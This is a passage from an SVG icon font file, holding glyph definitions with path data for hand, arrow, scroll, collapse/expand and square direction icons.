10-1 4-4 7-7 8-5 1-5 1-60-28 19 17 29 27 35 33l2 1-1 0c8 8 7 10 5 13-1 3-4 5-6 5s-6 1-8 0c-21-11-48-25-71-37 42 43 41 44 38 50 0 1-1 2-2 2l39 0z m-129 0h75c-26-13-60-31-82-42l10 32c1 4 0 8-3 10z m-15 0c-19-10-40-21-43-22l3-10-3-9c4-2 5-2 34 13l-10-31c-1-2-1-5 0-8 2-2 4-4 6-5 5-1 6-1 60 27-13-13-26-26-36-37-3-3-4-6-3-10 1-3 3-6 7-7 4-1 5-2 60 27-13-12-27-24-39-34-3-3-4-6-3-10 0-4 3-7 6-8 5-1 6-1 73 34l-48-45c-2-3-3-7-3-10 1-4 4-6 7-7 4-1 5 2 44 19h0c-11-17-18-16-23-20l-1-1 0-1c-8-8-7-10-5-13 3-5 9-8 14-5l33 17c-10-8-17-14-22-18l0 0 0 0c-8-8-7-10-5-14 1-3 3-4 6-5 4-2 4-2 34 14 11 5 25 13 39 20l-49-46c-3-3-4-9-1-13 2-3 5-4 8-4 2 0 3 0 5 1 17 8 36 18 55 28-20-18-32-28-38-35l-1 0 0-1c-8-7-7-9-5-13 3-5 9-7 14-4l55 27c-19-16-39-33-55-47-1 0-2-2-3-3 1 3 0 5-1 7l0 0c-1 2-2 4-4 6l-256 256 94 0z" />
<glyph glyph-name="hand-drawn-up" horiz-adv-x="1000" unicode="&#xea89;" d="M231 60l269 269 271-271c5-5 12-7 19-4 6 3 10 9 10 16v283c0 4-2 9-5 12l-283 283h-24l-283-283c-3-4-5-8-5-12v-283c0 0 0 0 0-1 0-9 8-16 17-16 6 0 11 2 14 7z m419 167l-46 45c1 0 2 0 3 0 2 2 4 4 5 6 0 2 1 3-2 9l0 0c-3 9-11 26-30 64 51-82 78-125 93-148l-23 24z m76-76l-29 29c0 0 1 0 2 1 2 1 4 3 5 6 0 0 0 1 0 1 0 2 0 4-3 9-4 10-16 34-45 90l96-162-26 26z m40 11v-18c-4 7-8 16-14 28-13 24-31 58-51 98 36-63 54-92 63-105l2-3z m0 184v-3c-1 2-2 4-3 6l3-3z m0-49v-18c-6 13-14 28-25 49-5 9-10 19-15 29 14-21 28-42 40-60z m-31-14c15-23 24-37 30-46 1-1 1-2 1-2v-29l-77 152 46-75z m-158 17l-65 65c-2 1-3 2-5 3h0c4 1 7 4 8 7 1 3 1 4-8 23l70-98z m72 163c2-4 4-8 6-13l-10 17 4-4z m-74 74l34-67c-15 26-30 52-44 77l10-10z m-65 64l0 0c6-14 24-51 82-165l-89 152 7 14 0-1z m-276-255l266 266 10-10-26-16c0-2-1-2 2-8l-1 0 3-6c8-17 31-60 89-175 3-6 6-12 9-18-69 111-97 156-111 174 0 1-1 3-2 5l-1-1c-7 8-9 7-13 5-2-1-4-3-5-6-1-3 0-5 1-8 24-47 55-105 81-155l-95 134c-3 4-9 6-14 3-5-3-7-9-4-14 11-19 24-44 36-68-24 28-37 43-45 50l0 0c-8 8-10 7-14 5-5-3-7-9-4-14l28-54c-9 10-16 18-22 24-5 6-10 11-13 14-8 8-10 7-14 5-2-1-4-3-5-6-1-3-1-4 33-71l-44 47c-3 3-8 4-12 2-2-1-4-4-5-6-1-4-2-5 15-37-7 8-12 14-15 18l-1 1 0 0c-7 7-9 6-13 4-5-2-7-8-5-13l21-41c-9 11-17 22-24 31-4 4-10 5-14 2s-6-8-3-13c9-19 22-43 33-65l-46 48c-2 2-6 4-9 3-4-1-7-4-8-7-1-5-1-5 27-60-16 19-26 30-32 36l-1 1 0 0c-8 7-10 6-13 4-3-1-4-3-5-6-1-2-1-5 0-8 11-20 25-47 37-70-42 42-44 41-50 38-1-1-2-1-2-2l0 38z m0-128v75c13-26 31-60 42-82l-32 10c-3 1-7 0-10-3z m0-14c10-20 21-41 22-44l10 4 9-3c2 4 2 5-13 33l31-10c2-1 5-1 7 1 3 1 5 3 5 6 2 4 2 5-26 59 13-13 26-26 37-36 2-3 6-4 9-3s6 3 8 7c1 4 1 5-27 60 12-14 24-28 34-39 2-3 6-4 9-4 4 1 7 4 8 7 2 5 2 5-33 72l45-47c2-3 6-4 9-3 4 1 6 3 7 7 1 3-2 4-19 43 17-11 16-18 20-23l1-1 1 0c8-7 10-6 13-5 5 3 7 9 5 14l-17 33c8-10 14-17 18-22l0 0h0c8-8 10-7 14-5 2 1 4 3 5 6 1 4 1 4-14 34-6 10-13 24-20 38l45-48c4-4 9-4 13-1 3 2 5 5 5 8 0 2-1 3-1 5-9 16-19 36-28 54 17-20 28-31 34-38l0-1 1 1c8-8 9-7 13-5 5 3 7 9 5 14l-28 54c16-19 33-39 47-55 0-1 2-1 3-2-3 0-5 0-7-1h0c-2-1-4-2-6-4l-254-254v94z" />
<glyph glyph-name="hand-grippers" horiz-adv-x="1000" unicode="&#xea8a;" d="M344 448c-10 6-20 11-34 18 37 52 8 94-19 143-13-38-24-72-37-105-5-10-17-22-27-24-42-7-66-28-72-69 55-52 48-95-20-123-24-10-30-27-11-50 34-42 24-81-25-102-30-13-33-33-18-58 26-44 19-71-24-97-10-7-21-23-22-35-4-39 18-64 54-76 20-7 41-13 62-20h55c24 17 46 32 44 70-6 157 31 303 113 438 20 34 15 67-19 90z m610-431l-4 16c-1 1-1 2-1 2-32 120-63 239-95 358-18 70-29 80-100 88-24 80-47 161-73 241-27 85-102 132-196 128-77-4-149-66-167-146-19-81 20-165 92-206 74-41 166-29 226 32 8 8 12 19 18 29l10-8c9-29 17-58 26-87-69-34-75-59-39-122 71-123 105-257 103-399 0-32 4-57 22-78 0-1 18-19 69-13 0 0 34 4 69 17 3 1 6 3 9 4l2 1c12 6 22 14 30 24 19 24 7 87-1 119z m-450 521c-67-1-125 56-126 123-1 67 56 125 123 126 67 1 125-56 126-123 1-67-56-125-123-126z" />
<glyph glyph-name="hand-left" horiz-adv-x="1000" unicode="&#xea8b;" d="M702 75c9 7 23 9 35 12 22 6 43 11 65 16 12 3 18 8 18 22-1 86-1 173 0 260 0 12-4 18-17 21-39 10-78 21-116 33-10 3-21 9-28 17-51 58-101 117-151 175-15 17-32 27-55 21-23-5-37-18-44-40-6-19 0-36 13-51 22-27 45-53 67-80 2-2 4-5 5-8 2-5-1-11-6-13-3-1-6-1-10-1-104-1-208-1-312-1h-41c-38 0-62-19-62-51-1-31 24-53 61-53 14 0 28 0 42 0h194c4 0 8-1 12-1 6-1 11-3 12-5 0-2-4-5-9-6-3-1-6-1-9-1-37-1-73 0-110-1-29 0-49-17-51-43-1-25 16-45 44-47 41-2 81-1 122-2 4 0 8 0 12-1 2 0 4 0 6-1 4-1 5-5 3-7-2-1-3-2-5-2-3-1-6-2-9-2-31 0-62 0-93 0-28 0-44-15-45-40-1-24 19-46 45-46 43-1 86 0 129-1 3 0 7 0 10-1 5-1 9-4 9-6 0-2-4-4-9-5-3 0-7-1-10-1-30 0-61 0-91 0-24 0-39-13-43-36-3-20 9-42 29-48 9-3 20-4 30-4 91-1 183-1 275-1 32 1 62 7 88 29z m143 305v-256c0-15 12-27 28-27h37c15 0 28 12 28 27v256c0 15-13 27-28 27h-37c-16 0-28-12-28-27z" />
<glyph glyph-name="hand-right" horiz-adv-x="1000" unicode="&#xea8c;" d="M298 75c-9 7-23 9-35 12-22 6-43 11-65 16-12 3-18 8-18 22 1 86 1 173 0 260 0 12 4 18 17 21 39 10 78 21 116 33 11 3 21 9 28 17 51 58 101 117 151 175 15 17 32 27 56 21 22-5 36-18 43-40 6-19 0-36-13-51-22-27-45-53-67-80-2-2-4-5-5-8-2-5 1-11 6-13 3-1 7-1 10-1 104-1 208-1 312-1h41c38 0 62-19 62-51 1-31-24-53-61-53-14 0-28 0-42 0h-194c-4 0-8-1-11-1-7-1-12-3-12-5-1-2 3-5 8-6 3-1 6-1 9-1 37-1 74 0 110-1 29 0 49-17 51-43 1-25-16-45-44-47-41-2-81-1-122-2-4 0-8 0-12-1-2 0-4 0-6-1-4-1-5-5-3-7 2-1 3-2 5-2 3-1 6-2 9-2 31 0 62 0 93 0 28 0 45-15 45-40 1-24-19-46-45-46-43-1-86 0-129-1-3 0-7 0-10-1-5-1-9-4-9-6 0-2 4-4 9-5 4 0 7-1 10-1 30 0 61 0 91 0 24 0 39-13 43-36 4-20-9-42-29-48-9-3-20-4-30-4-91-1-183-1-275-1-32 1-62 7-88 29z m-143 305v-256c0-15-12-27-28-27h-37c-15 0-27 12-27 27v256c0 15 12 27 27 27h37c16 0 28-12 28-27z" />
<glyph glyph-name="hand-up" horiz-adv-x="1000" unicode="&#xea8d;" d="M775 148c-7-9-9-23-12-35-6-22-11-43-16-65-3-12-8-18-22-18-86 1-173 1-260 0-12 0-18 4-21 17-10 39-21 78-33 116-3 10-9 21-17 28-58 51-117 101-175 151-17 15-26 32-21 56 5 22 18 36 40 43 19 6 36 0 51-12 27-23 53-46 80-68 2-2 5-4 8-5 5-1 11 1 13 6 1 3 1 7 1 10 1 104 1 208 1 312v41c0 38 19 62 51 63 30 0 53-25 53-62 0-14 0-28 0-42v-194c0-4 1-7 1-11 1-7 3-12 5-12 2-1 5 3 6 8 1 3 1 6 1 9 1 37 0 74 1 111 0 28 17 49 43 50 25 1 45-16 47-44 2-40 1-81 2-122 0-3 0-7 1-11 0-3 0-5 1-7 1-4 6-5 7-2 1 1 2 3 2 5 1 3 2 6 2 9 0 31 0 62 0 93 0 27 15 44 40 45 24 1 46-19 46-45 1-43 0-86 1-129 0-4 0-7 1-10 1-5 4-10 6-10 2 1 4 5 5 10 0 3 1 6 1 9 0 31 0 61 0 92 0 24 13 39 36 43 20 3 42-9 48-29 3-10 4-20 4-30 1-92 1-184 0-275 0-33-6-63-28-89z m-305-143h256c15 0 27-12 27-28v-37c0-15-12-28-27-28h-256c-15 0-27 13-27 28v37c0 16 12 28 27 28z" />
<glyph glyph-name="line-block-down" horiz-adv-x="1000" unicode="&#xea8e;" d="M500 243l283 292 40-38-323-332-322 332 39 38z m438-331v876h-875v-876h875z m-32 32h-812v812h812v-812z m-689 591z" />
<glyph glyph-name="line-block-left" horiz-adv-x="1000" unicode="&#xea8f;" d="M393 350l292 283-38 40-332-323 332-322 38 39z m-331-438h876v876h-876v-876z m844 844v-812h-812v812h812z m-221-689z" />
<glyph glyph-name="line-block-right" horiz-adv-x="1000" unicode="&#xea90;" d="M315 67l38-40 332 323-332 322-38-39 292-283z m-253 721v-876h876v876h-876z m844-844h-812v812h812v-812z m-591 689z" />
<glyph glyph-name="line-block-up" horiz-adv-x="1000" unicode="&#xea91;" d="M500 457l283-292 40 38-323 332-322-332 39-38z m-437 331v-876h875v876h-875z m843-844h-812v812h812v-812z m-689 221z" />
<glyph glyph-name="long-arrow-down" horiz-adv-x="1000" unicode="&#xea92;" d="M537 624v-412h110c14 0 18-8 8-18l-137-136c-10-10-26-10-36 0l-136 136c-11 10-7 18 7 18h110v412c0 14 11 26 26 26h23c14 0 25-12 25-26z" />
<glyph glyph-name="long-arrow-left" horiz-adv-x="1000" unicode="&#xea93;" d="M774 313c14 0 26 11 26 26v22c0 15-12 26-26 26h-412v110c0 14-8 18-18 8l-136-137c-10-10-10-26 0-36l136-136c10-11 18-7 18 7v110h412z" />
<glyph glyph-name="long-arrow-right" horiz-adv-x="1000" unicode="&#xea94;" d="M226 313h412v-110c0-14 8-18 18-7l136 136c11 10 11 26 0 36l-136 137c-10 10-18 6-18-8v-110h-412c-14 0-26-11-26-25v-23c0-15 12-26 26-26z" />
<glyph glyph-name="long-arrow-up" horiz-adv-x="1000" unicode="&#xea95;" d="M537 76v412h110c14 0 18 8 8 18l-137 136c-10 11-26 11-36 0l-136-136c-11-10-7-18 7-18h110v-412c0-14 11-26 26-26h23c14 0 25 12 25 26z" />
<glyph glyph-name="rounded-collapse" horiz-adv-x="1000" unicode="&#xea96;" d="M478 418c6-6 14-9 22-9s16 3 23 9l163 164c12 12 12 32 0 45l-14 14c-13 12-33 12-45 0l-104-104c-7-7-15-10-23-10s-16 3-22 10l-105 104c-12 12-32 12-45 0l-14-14c-12-13-12-33 0-45l164-164z m45-136c-7 6-15 9-23 9s-16-3-22-9l-164-164c-12-12-12-32 0-45l14-14c13-12 33-12 45 0l105 105c6 6 14 9 22 9s16-3 23-9l104-105c12-12 32-12 45 0l14 14c12 13 12 33 0 45l-163 164z" />
<glyph glyph-name="rounded-double-left" horiz-adv-x="1000" unicode="&#xea97;" d="M212 378l203 203c15 16 40 16 56 0l17-17c16-16 16-41 0-56l-129-130c-8-8-12-18-12-28s4-20 12-28l129-130c16-15 16-40 0-56l-17-17c-16-16-41-16-56 0l-203 203c-8 8-12 18-12 28 0 10 4 20 12 28z m300 0l203 203c15 16 40 16 56 0l17-17c16-16 16-41 0-56l-129-130c-8-8-12-18-12-28s4-20 12-28l129-130c16-15 16-40 0-56l-17-17c-16-16-41-16-56 0l-203 203c-8 8-12 18-12 28 0 10 4 20 12 28z" />
<glyph glyph-name="rounded-double-right" horiz-adv-x="1000" unicode="&#xea98;" d="M788 378l-203 203c-15 16-40 16-56 0l-17-17c-16-16-16-41 0-56l129-130c8-8 12-18 12-28s-4-20-12-28l-129-130c-16-15-16-40 0-56l17-17c16-16 41-16 56 0l203 203c8 8 12 18 12 28 0 10-4 20-12 28z m-300 0l-203 203c-15 16-40 16-56 0l-17-17c-16-16-16-41 0-56l129-130c8-8 12-18 12-28s-4-20-12-28l-129-130c-16-15-16-40 0-56l17-17c16-16 41-16 56 0l203 203c8 8 12 18 12 28 0 10-4 20-12 28z" />
<glyph glyph-name="rounded-down" horiz-adv-x="1000" unicode="&#xea99;" d="M786 430l-251-251c-10-9-22-14-35-14s-25 5-34 14l-251 251c-20 19-20 50 0 69l21 22c19 19 50 19 69 0l161-160c9-10 22-14 34-14s25 4 35 14l160 160c19 19 50 19 69 0l22-22c19-19 19-50 0-69z" />
<glyph glyph-name="rounded-expand" horiz-adv-x="1000" unicode="&#xea9a;" d="M328 418c13-12 33-12 45 0l105 105c6 6 14 9 22 9s16-3 23-9l104-105c12-12 32-12 45 0l14 14c12 13 12 33 0 45l-163 164c-7 6-15 9-23 9s-16-3-22-9l-164-164c-12-12-12-32 0-45l14-14z m344-136c-13 12-33 12-45 0l-104-104c-7-7-15-10-23-10s-16 3-22 10l-105 104c-12 12-32 12-45 0l-14-14c-12-13-12-33 0-45l164-164c6-6 14-9 22-9s16 3 23 9l163 164c12 12 12 32 0 45l-14 14z" />
<glyph glyph-name="rounded-left-down" horiz-adv-x="1000" unicode="&#xea9b;" d="M288 138c-9 9-14 21-14 35v355c0 27 22 49 49 49h30c27 0 49-22 49-49v-227c0-13 6-26 14-35s22-14 35-14h227c27 0 49-22 49-49v-30c0-28-22-49-49-49h-355c-14 0-26 5-35 14z" />
<glyph glyph-name="rounded-left-up" horiz-adv-x="1000" unicode="&#xea9c;" d="M288 562c9 9 21 14 35 14h355c27 0 49-21 49-49v-30c0-27-22-49-49-49h-227c-13 0-26-5-35-14s-14-21-14-35v-226c0-28-22-49-49-49h-30c-28 0-49 21-49 49v355c0 13 5 25 14 34z" />
<glyph glyph-name="rounded-left" horiz-adv-x="1000" unicode="&#xea9d;" d="M649 64l22 22c19 19 19 50 0 69l-160 160c-10 10-15 22-15 35s5 25 15 35l160 160c19 19 19 50 0 69l-22 22c-19 19-50 19-69 0l-251-251c-9-10-14-22-14-35s4-25 14-35l251-251c19-19 50-19 69 0z" />
<glyph glyph-name="rounded-right-down" horiz-adv-x="1000" unicode="&#xea9e;" d="M712 138c9 9 14 21 14 35v355c0 27-21 49-49 49h-30c-27 0-49-22-49-49v-227c0-13-5-26-14-35s-21-14-35-14h-226c-28 0-49-22-49-49v-30c0-28 21-49 49-49h355c13 0 25 5 34 14z" />
<glyph glyph-name="rounded-right-up" horiz-adv-x="1000" unicode="&#xea9f;" d="M712 562c-9 9-21 14-34 14h-355c-28 0-49-21-49-49v-30c0-27 21-49 49-49h226c14 0 26-5 35-14s14-21 14-35v-226c0-28 22-49 49-49h31c27 0 49 21 49 49v355c0 13-6 25-15 34z" />
<glyph glyph-name="rounded-right" horiz-adv-x="1000" unicode="&#xeaa0;" d="M420 64l251 251c10 10 14 23 14 35s-4 25-14 35l-251 251c-19 19-50 19-69 0l-22-22c-19-19-19-50 0-69l160-160c10-10 15-22 15-35s-5-25-15-35l-160-160c-19-19-19-50 0-69l22-22c19-19 50-19 69 0z" />
<glyph glyph-name="rounded-up" horiz-adv-x="1000" unicode="&#xeaa1;" d="M786 270l-251 251c-10 10-22 14-35 14s-25-5-34-14l-251-251c-20-19-20-50 0-69l21-22c19-19 50-19 69 0l161 160c9 10 22 15 34 15s25-5 35-15l160-160c19-19 50-19 69 0l22 22c19 19 19 50 0 69z" />
<glyph glyph-name="scroll-bubble-down" horiz-adv-x="1000" unicode="&#xeaa2;" d="M500 850c-151 0-273-122-273-273v-454c0-151 122-273 273-273s273 122 273 273v454c0 151-122 273-273 273z m236-727c0-130-106-236-236-236s-236 106-236 236v454c0 131 106 237 236 237s236-106 236-237l0-454z m-165-93c0-39-32-71-71-71s-71 32-71 71c0 39 32 71 71 71s71-32 71-71z m-19 136c0-28-24-51-52-51-28 0-51 23-51 51s23 52 51 52c29 0 52-23 52-52z m-15 102c0-20-16-37-37-37-21 0-37 17-37 37 0 21 17 37 37 37 21 0 37-17 37-37z" />
<glyph glyph-name="scroll-bubble-left" horiz-adv-x="1000" unicode="&#xeaa3;" d="M1000 350c0 151-122 273-273 273h-454c-151 0-273-122-273-273s122-273 273-273h454c151 0 273 122 273 273z m-273 236c131 0 237-106 237-236s-106-236-237-236h-454c-130 0-236 106-236 236s106 236 236 236h454z m-618-236c0 39 32 71 71 71s71-32 71-71-32-71-71-71-71 32-71 71z m156 0c0 29 23 52 51 52s52-24 52-52c0-28-23-51-52-51s-51 23-51 51z m116 0c0 21 17 37 37 37s37-16 37-37-16-37-37-37-37 17-37 37z" />
<glyph glyph-name="scroll-bubble-right" horiz-adv-x="1000" unicode="&#xeaa4;" d="M0 350c0-151 122-273 273-273h454c151 0 273 122 273 273s-122 273-273 273h-454c-151 0-273-122-273-273z m727 236c130 0 236-106 236-236s-106-236-236-236h-454c-131 0-237 106-237 236s106 236 237 236h454z m164-236c0-39-32-71-71-71s-71 32-71 71 32 71 71 71 71-32 71-71z m-156 0c0-28-23-51-51-51s-52 23-52 51c0 29 23 52 52 52s51-23 51-52z m-116 0c0-20-17-37-37-37s-37 17-37 37 16 37 37 37 37-16 37-37z" />
<glyph glyph-name="scroll-bubble-up" horiz-adv-x="1000" unicode="&#xeaa5;" d="M773 123v454c0 151-122 273-273 273s-273-122-273-273v-454c0-151 122-273 273-273s273 122 273 273z m-37 0c0-130-106-236-236-236s-236 105-236 236v454c0 131 106 237 236 237s236-107 236-237v-454z m-165 547c0-39-32-71-71-71s-71 32-71 71 32 71 71 71 71-31 71-71z m-19-136c0-29-24-52-52-52-28 0-51 24-51 52 0 28 23 51 51 51 29 0 52-23 52-51z m-15-102c0-20-16-37-37-37s-37 17-37 37 17 37 37 37c21 0 37-16 37-37z" />
<glyph glyph-name="scroll-double-down" horiz-adv-x="1000" unicode="&#xeaa6;" d="M227 577v-454c0-151 122-273 273-273s273 122 273 273v454c0 151-122 273-273 273s-273-122-273-273z m37 0c0 131 106 237 236 237s236-107 236-237v-454c0-131-105-237-236-237s-236 106-236 237v454z m344-304l-108-108-108 108c-3 3-8 3-12 0-3-3-3-8 0-12l114-113c2-2 4-3 6-3s4 1 6 3l114 113c3 4 3 9 0 12-3 3-9 3-12 0z m49-137l-157-156-156 156c-5 5-13 5-17 0-5-4-5-12 0-16l165-165c2-3 5-4 8-4 3 0 6 1 8 4l165 165c5 4 5 12 0 16-4 5-12 5-16 0z" />
<glyph glyph-name="scroll-double-left" horiz-adv-x="1000" unicode="&#xeaa7;" d="M727 623h-454c-151 0-273-122-273-273s122-273 273-273h454c151 0 273 122 273 273 0 151-122 273-273 273z m-454-37h454c131 0 237-106 237-236s-106-236-237-236h-454c-130 0-236 106-236 236s105 236 236 236z m-5-239l54-54c2-1 4-1 6 0s1 4 0 6l-52 51 52 51c1 2 1 4 0 6s-4 1-6 0l-54-54c-1-1-1-2-1-3s0-2 1-3z m-23 115c3 4 3 9 0 12-4 3-9 3-12 0l-119-118c-1-2-2-4-2-6 0-2 1-4 2-6l119-118c3-3 8-3 12 0 3 3 3 9 0 12l-113 112 113 112z" />
<glyph glyph-name="scroll-double-right" horiz-adv-x="1000" unicode="&#xeaa8;" d="M0 350c0-151 122-273 273-273h454c151 0 273 122 273 273s-122 273-273 273h-454c-151 0-273-122-273-273z m727 236c130 0 236-106 236-236s-106-236-236-236h-454c-130 0-236 106-236 236s106 236 236 236h454z m5-239c1 1 1 2 1 3s0 2-1 3l-54 54c-2 1-4 1-6 0s-1-4 0-6l52-51-52-51c-1-2-1-4 0-6s4-1 6 0l54 54z m23 115l113-112-113-112c-3-4-3-9 0-12 4-4 9-4 12 0l119 118c1 2 2 4 2 6 0 2-1 4-2 6l-119 118c-3 3-8 3-12 0-3-3-3-8 0-12z" />
<glyph glyph-name="scroll-double-up" horiz-adv-x="1000" unicode="&#xeaa9;" d="M773 123v454c0 151-122 273-273 273s-273-122-273-273v-454c0-151 122-273 273-273s273 122 273 273z m-37 0c0-131-106-237-236-237s-236 106-236 237v454c0 131 106 237 236 237s236-107 236-237v-454z m-239 459c1 1 2 1 3 1 1 0 2 0 3-1l54-54c1-2 1-4 0-6s-4-1-6 0l-51 52-51-52c-2-1-4-1-6 0s-1 4 0 6l54 54z m115 23l-112 113-112-113c-4-3-9-3-12 0-4 4-4 9 0 12l118 119c2 1 4 2 6 2 2 0 4-1 6-2l118-119c3-3 3-8 0-12-3-3-8-3-12 0z" />
<glyph glyph-name="scroll-down" horiz-adv-x="1000" unicode="&#xeaaa;" d="M500 850c-151 0-273-122-273-273v-454c0-151 122-273 273-273s273 122 273 273v454c0 151-122 273-273 273z m236-727c0-131-106-237-236-237s-236 106-236 237v454c0 131 106 237 236 237s236-106 236-237l0-454z m-99-39l-129-130c-5-4-11-4-16 0l-129 130c-5 4-5 11 0 15l26 26c4 4 11 4 15 0l89-89c4-4 11-4 15 0l89 89c4 4 11 4 15 0l26-26c4-4 4-11-1-15z" />
<glyph glyph-name="scroll-left" horiz-adv-x="1000" unicode="&#xeaab;" d="M1000 350c0 151-122 273-273 273h-454c-151 0-273-122-273-273s122-273 273-273h454c151 0 273 122 273 273z m-273 236c131 0 237-106 237-236s-106-236-237-236h-454c-130 0-236 106-236 236s106 236 236 236h454z m-452-124l-26 25c-4 5-11 5-15 0l-130-130c-4-4-4-11 0-15l130-130c4-4 11-4 15 0l26 26c4 4 4 11 0 16l-89 88c-4 4-4 11 0 16l89 88c4 4 4 11 0 16z" />
<glyph glyph-name="scroll-long-down" horiz-adv-x="1000" unicode="&#xeaac;" d="M271 621v-381c0-108 75-199 175-223v32c-83 23-144 100-144 190v382c0 109 89 199 198 199s199-90 199-199v-381c0-91-62-168-145-191v-32c100 24 175 115 175 223v381c0 126-102 229-229 229s-229-103-229-229z m206-671v255c0 9 7 16 16 16h14c9 0 16-7 16-16v-255h68c9 0 11-5 5-11l-85-84c-6-7-16-7-22 0l-85 84c-6 6-4 11 5 11h68v0z m30 673h-14c-9 0-16 7-16 16v94c0 9 7 16 16 16h14c9 0 16-7 16-16v-94c0-9-7-16-16-16z" />
<glyph glyph-name="scroll-long-left" horiz-adv-x="1000" unicode="&#xeaad;" d="M771 579c126 0 229-102 229-229s-103-229-229-229h-381c-108 0-199 75-223 175h32c24-83 100-144 191-144h381c110 0 199 89 199 198s-90 199-199 199h-381c-91 0-168-62-191-145h-32c24 100 115 175 223 175l381 0z m-671-206v68c0 9-5 11-11 5l-84-85c-7-6-7-16 0-22l84-84c6-7 11-5 11 4v68h255c9 0 16 7 16 16v14c0 9-7 16-16 16l-255 0z m673-30c0-9 7-16 16-16h94c9 0 16 7 16 16v14c0 9-7 16-16 16h-94c-9 0-16-7-16-16v-14z" />
<glyph glyph-name="scroll-long-right" horiz-adv-x="1000" unicode="&#xeaae;" d="M229 579h382c107 0 198-74 222-175h-32c-23 83-100 145-190 145h-382c-109 0-199-90-199-199s90-198 199-198h381c91 0 168 61 191 144h32c-24-100-115-175-223-175h-381c-126 0-229 102-229 229s103 229 229 229z m671-206h-255c-9 0-16-7-16-16v-14c0-9 7-16 16-16h255v-68c0-9 5-11 11-5l84 85c7 6 7 16 0 22l-84 84c-6 7-11 4-11-4v-68z m-673-30v14c0 9-7 16-16 16h-94c-9 0-16-7-16-16v-14c0-9 7-16 16-16h94c9 0 16 7 16 16z" />
<glyph glyph-name="scroll-long-up" horiz-adv-x="1000" unicode="&#xeaaf;" d="M729 79v382c0 107-75 198-175 222v-32c83-23 144-100 144-190v-382c0-109-89-199-198-199s-199 90-199 199v382c0 90 62 167 145 190v32c-100-24-175-115-175-222v-382c0-126 102-229 229-229s229 103 229 229z m-206 671v-255c0-9-7-16-16-16h-14c-9 0-16 7-16 16v255h-68c-9 0-11 5-4 11l84 84c6 7 16 7 22 0l85-84c6-6 4-11-5-11h-68z m-30-673h14c9 0 16-7 16-16v-94c0-9-7-16-16-16h-14c-9 0-16 7-16 16v94c0 9 7 16 16 16z" />
<glyph glyph-name="scroll-right" horiz-adv-x="1000" unicode="&#xeab0;" d="M0 350c0-151 122-273 273-273h454c151 0 273 122 273 273s-122 273-273 273h-454c-151 0-273-122-273-273z m727 236c130 0 236-106 236-236s-106-236-236-236h-454c-131 0-237 106-237 236s106 236 237 236h454z m-2-124c-4-5-4-12 0-16l89-88c4-5 4-12 0-16l-89-88c-4-5-4-12 0-16l26-26c4-4 11-4 16 0l129 130c4 4 4 11 0 15l-130 130c-4 5-11 5-15 0l-26-25z" />
<glyph glyph-name="scroll-up" horiz-adv-x="1000" unicode="&#xeab1;" d="M773 123v454c0 151-122 273-273 273s-273-122-273-273v-454c0-151 122-273 273-273s273 122 273 273z m-37 0c0-131-106-237-236-237s-236 106-236 237v454c0 131 106 237 236 237s236-107 236-237v-454z m-124 452c-5-4-12-4-16 0l-88 89c-5 4-11 4-16 0l-88-89c-5-4-11-4-16 0l-26 26c-4 4-4 11 0 16l130 129c5 5 11 5 16 0l129-129c5-5 5-12 0-16l-25-26z" />
<glyph glyph-name="simple-down" horiz-adv-x="1000" unicode="&#xeab2;" d="M200 457l300-300 300 300-85 86-215-215-215 215-85-86z" />
<glyph glyph-name="simple-left-down" horiz-adv-x="1000" unicode="&#xeab3;" d="M200 50h600v170h-430v430h-170v-600z" />
<glyph glyph-name="simple-left-up" horiz-adv-x="1000" unicode="&#xeab4;" d="M200 650v-600h170v430h430v170h-600z" />
<glyph glyph-name="simple-left" horiz-adv-x="1000" unicode="&#xeab5;" d="M607 650l-300-300 300-300 86 85-215 215 215 215z" />
<glyph glyph-name="simple-right-down" horiz-adv-x="1000" unicode="&#xeab6;" d="M800 220v430h-170v-430h-430v-170h600v170z" />
<glyph glyph-name="simple-right-up" horiz-adv-x="1000" unicode="&#xeab7;" d="M630 650h-430v-170h430v-430h170v600h-170z" />
<glyph glyph-name="simple-right" horiz-adv-x="1000" unicode="&#xeab8;" d="M393 50l300 300-300 300-85-85 214-215-215-215z" />
<glyph glyph-name="simple-up" horiz-adv-x="1000" unicode="&#xeab9;" d="M285 157l215 215 215-215 85 86-300 300-300-300 85-86z" />
<glyph glyph-name="square-down" horiz-adv-x="1000" unicode="&#xeaba;" d="M871 788h-742c-37 0-66-30-66-67v-742c0-37 29-66 66-66h742c37 0 66 29 66 66v742c1 37-29 67-66 67z m-57-337l-296-296c-10-10-26-10-35 0l-296 296c-10 10-10 26 0 35l59 59c9 10 25 10 35 0l202-202c9-10 25-10 35 0l202 202c9 10 25 10 35 0l59-59c9-9 9-25 0-35z" />
<glyph glyph-name="square-left" horiz-adv-x="1000" unicode="&#xeabb;" d="M938-21v742c0 37-30 67-67 67h-742c-37 0-66-30-66-67v-742c0-37 29-66 66-66h742c37-1 67 29 67 66z m-337 57l-296 296c-10 10-10 26 0 35l296 296c10 10 26 10 35 0l59-58c10-10 10-26 0-36l-202-202c-10-9-10-25 0-35l202-202c10-9 10-25 0-35l-59-59c-9-9-25-9-35 0z" />
<glyph glyph-name="square-right" horiz-adv-x="1000" unicode="&#xeabc;" d="M63 721v-742c0-37 29-66 66-66h742c37 0 66 29 66 66v742c0 37-29 67-66 67h-742c-37 0-66-30-66-67z m336-57l296-296c10-10 10-26 0-35l-296-296c-10-10-26-10-35 0l-59 59c-10 9-10 25 0 35l202 202c10 9 10 25 0 35l-202 202c-10 9-10 25 0 35l59 59c9 9 25 9 35 0z" />
<glyph glyph-name="square-up" horiz-adv-x="1000" unicode="&#xeabd;" d="M129-88h742c37 0 66 30 66 67v742c0 37-29 67-66 67h-742c-37 0-66-30-66-67v-742c0-37 29-67 66-67z m57 337l296 296c10 10 26 10 35 0l296-296c10-10 10-26 0-35l-58-59c-10-10-26-10-36 0l-202 202c-9 10-25 10-35 0l-202-202c-9-10-25-10-35 0l-59 59c-9 9-9 25 0 35z" />
